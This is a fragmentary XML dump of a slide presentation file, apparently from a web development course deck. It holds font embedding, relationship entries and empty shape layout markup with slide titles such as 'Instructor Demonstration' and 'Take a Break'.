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48" r:id="rId1"/>
    <p:sldMasterId id="2147483749" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId41"/>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Lst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
      <p:italic r:id="rId44"/>
      <p:boldItalic r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
      <p:italic r:id="rId48"/>
      <p:boldItalic r:id="rId49"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId50"/>
      <p:bold r:id="rId51"/>
      <p:italic r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId54"/>
      <p:bold r:id="rId55"/>
      <p:italic r:id="rId56"/>
      <p:boldItalic r:id="rId57"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Light" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId58"/>
      <p:bold r:id="rId59"/>
      <p:italic r:id="rId60"/>
      <p:boldItalic r:id="rId61"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Medium" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId62"/>
      <p:bold r:id="rId63"/>
      <p:italic r:id="rId64"/>
      <p:boldItalic r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId66"/>
      <p:bold r:id="rId67"/>
      <p:italic r:id="rId68"/>
      <p:boldItalic r:id="rId6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697"/>
    <p:restoredTop sz="94652"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="138" d="100"/>
          <a:sy n="138" d="100"/>
        </p:scale>
        <p:origin x="880"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font" Target="fonts/font1.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font6.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font22.fntdata"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font27.fntdata"/><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font" Target="fonts/font4.fntdata"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font12.fntdata"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font17.fntdata"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font25.fntdata"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font20.fntdata"/><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font" Target="fonts/font2.fntdata"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7.fntdata"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font15.fntdata"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font23.fntdata"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font28.fntdata"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font10.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme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font" Target="fonts/font5.fntdata"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font18.fntdata"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font26.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font13.fntdata"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font21.fntdata"/><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font" Target="fonts/font8.fntdata"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font16.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font" Target="fonts/font3.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font11.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font19.fntdata"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font24.fntdata"/><Relationship Id="rId73"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font" Target="fonts/font9.fntdata"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font14.fntdata"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId7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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2026" name="Google Shape;2026;g480f0dd0a7_0_18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7" name="Google Shape;2027;g480f0dd0a7_0_18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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2120" name="Google Shape;2120;g5bbe20bd80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1" name="Google Shape;2121;g5bbe20bd80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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2130" name="Google Shape;2130;g5bbe20bd80_0_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1" name="Google Shape;2131;g5bbe20bd80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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2141" name="Google Shape;2141;g5bbe20bd80_0_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2" name="Google Shape;2142;g5bbe20bd80_0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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2149" name="Google Shape;2149;g526903d1f6_0_10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0" name="Google Shape;2150;g526903d1f6_0_10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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2161" name="Google Shape;2161;g5bbe20bd80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2" name="Google Shape;2162;g5bbe20bd80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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2170" name="Google Shape;2170;g5bbe20bd80_0_1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1" name="Google Shape;2171;g5bbe20bd80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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2180" name="Google Shape;2180;g5bbe20bd80_0_1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1" name="Google Shape;2181;g5bbe20bd80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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2190" name="Google Shape;2190;g5bbe20bd80_0_1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1" name="Google Shape;2191;g5bbe20bd80_0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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2200" name="Google Shape;2200;g526903d1f6_0_10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1" name="Google Shape;2201;g526903d1f6_0_10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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2208" name="Google Shape;2208;g526903d1f6_0_10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9" name="Google Shape;2209;g526903d1f6_0_10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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2033" name="Google Shape;2033;g5297670f7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4" name="Google Shape;2034;g5297670f7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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2215" name="Google Shape;2215;g5bbe20bd80_0_1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6" name="Google Shape;2216;g5bbe20bd80_0_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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2223" name="Google Shape;2223;g5bbe20bd80_0_1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4" name="Google Shape;2224;g5bbe20bd80_0_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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2232" name="Google Shape;2232;g5bbe20bd80_0_1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3" name="Google Shape;2233;g5bbe20bd80_0_1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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2241" name="Google Shape;2241;g5bbe20bd80_0_1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2" name="Google Shape;2242;g5bbe20bd80_0_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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2250" name="Google Shape;2250;g5bbe20bd80_0_1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1" name="Google Shape;2251;g5bbe20bd80_0_1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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2259" name="Google Shape;2259;g5bbe20bd80_0_1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0" name="Google Shape;2260;g5bbe20bd80_0_1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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2268" name="Google Shape;2268;g5bbe20bd80_0_1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9" name="Google Shape;2269;g5bbe20bd80_0_1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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2277" name="Google Shape;2277;g5bbe20bd80_0_2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8" name="Google Shape;2278;g5bbe20bd80_0_2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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2282" name="Google Shape;2282;g51e3c04b91_0_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3" name="Google Shape;2283;g51e3c04b91_0_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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2291" name="Google Shape;2291;g526903d1f6_0_11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2" name="Google Shape;2292;g526903d1f6_0_1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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2045" name="Google Shape;2045;g5297670f70_0_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6" name="Google Shape;2046;g5297670f70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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2298" name="Google Shape;2298;g5bbe20bd80_0_2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9" name="Google Shape;2299;g5bbe20bd80_0_2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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2308" name="Google Shape;2308;g5bbe20bd80_0_2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9" name="Google Shape;2309;g5bbe20bd80_0_2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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2319" name="Google Shape;2319;g5bbe20bd80_0_2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0" name="Google Shape;2320;g5bbe20bd80_0_2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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2331" name="Google Shape;2331;g5bbe20bd80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2" name="Google Shape;2332;g5bbe20bd80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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2344" name="Google Shape;2344;g5bbe20bd80_0_2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5" name="Google Shape;2345;g5bbe20bd80_0_2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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2353" name="Google Shape;2353;g5bbe20bd80_0_2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4" name="Google Shape;2354;g5bbe20bd80_0_2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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2361" name="Google Shape;2361;g526903d1f6_0_11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2" name="Google Shape;2362;g526903d1f6_0_1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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2368" name="Google Shape;2368;g5bbe20bd80_0_2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9" name="Google Shape;2369;g5bbe20bd80_0_2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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2377" name="Google Shape;2377;g5297670f70_0_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8" name="Google Shape;2378;g5297670f70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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2058" name="Google Shape;2058;g51d59e2588_0_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9" name="Google Shape;2059;g51d59e2588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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2069" name="Google Shape;2069;g526903d1f6_0_10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0" name="Google Shape;2070;g526903d1f6_0_10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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2077" name="Google Shape;2077;g5bbe20bd80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8" name="Google Shape;2078;g5bbe20bd80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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2088" name="Google Shape;2088;g5bbe20bd80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9" name="Google Shape;2089;g5bbe20bd80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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2098" name="Google Shape;2098;g5bbe20bd80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9" name="Google Shape;2099;g5bbe20bd80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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2109" name="Google Shape;2109;g5bbe20bd80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0" name="Google Shape;2110;g5bbe20bd80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4.png"/></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5.png"/></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3.png"/></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6.png"/></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14.png"/></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15.png"/></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13.png"/></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 Title Slide: Web Development">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Google Shape;8;p2"/>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9" name="Google Shape;9;p2"/>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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p2"/>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Web Development</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Google Shape;12;p2"/>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13" name="Google Shape;13;p2"/>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 name="Google Shape;14;p2"/>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 name="Google Shape;15;p2"/>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16" name="Google Shape;16;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="776110" y="1231212"/>
            <a:ext cx="2286002" cy="1703068"/>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10. Instructor Demonstration">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 82"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Google Shape;83;p11"/>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84" name="Google Shape;84;p11"/>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1"/>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87" name="Google Shape;87;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242550" y="3895344"/>
            <a:ext cx="8907900" cy="427500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="91425" rIns="914400" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">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
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p11"/>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9" name="Google Shape;89;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="409963" y="-228600"/>
            <a:ext cx="8535272" cy="4064423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4387000"/>
            <a:ext cx="9251400" cy="482100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="9125" rIns="914400"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50. Take a Break 2">
  <p:cSld name="CUSTOM_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 2020"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
